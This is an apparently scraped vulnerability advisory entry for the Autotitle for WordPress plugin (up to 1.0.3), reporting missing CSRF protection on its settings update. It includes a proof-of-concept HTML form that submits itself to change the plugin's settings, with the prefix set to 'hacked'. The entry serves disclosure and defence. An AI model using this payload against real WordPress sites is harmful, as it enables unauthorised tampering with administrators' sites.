Lucene search
Daniel RufWPEX-ID:54A00416-C7E3-44F3-8DD2-ED9E748055E6HistoryJan 02, 2024 - 12:00 a.m.
Autotitle for WordPress <= 1.0.3 - Settings Update to Stored XSS via CSRF
2024-01-0200:00:00
Daniel Ruf
48
wordpress
csrf
stored xss
security update
autotitle plugin
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=autotitle-for-wordpress.php" method="POST">
<input type="text" name="publish_only" value="Y">
<input type="text" name="limit" value="3">
<input type="text" name="maxlimit" value="6">
<input type="text" name="stoppers" value="! ? . ,">
<input type="text" name="include_stopper" value="Y">
<input type="text" name="exclude_stopper" value=",">
<input type="text" name="prefix" value="hacked">
<input type="text" name="postfix" value="">
<input type="text" name="do" value="Update">
</form>
<script>
document.forms[0].submit();
</script>References
Related
prion
prion
Cross site request forgery (csrf)
2024-01-29 15:15:00
nvd
nvd
CVE-2023-6946
2024-01-29 15:15:09
cvelist
cvelist
cve
cve
CVE-2023-6946
2024-01-29 15:15:09
wpvulndb
wpvulndb
Autotitle for WordPress <= 1.0.3 - Settings Update to Stored XSS via CSRF
2024-01-02 00:00:00
wordfence
wordfence
6.7 Medium
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
32.7%
Related for WPEX-ID:54A00416-C7E3-44F3-8DD2-ED9E748055E6